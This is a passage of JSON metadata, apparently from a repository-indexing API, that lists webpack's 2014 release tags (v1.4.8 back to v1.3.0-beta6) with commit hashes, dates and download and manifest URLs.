ack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_pars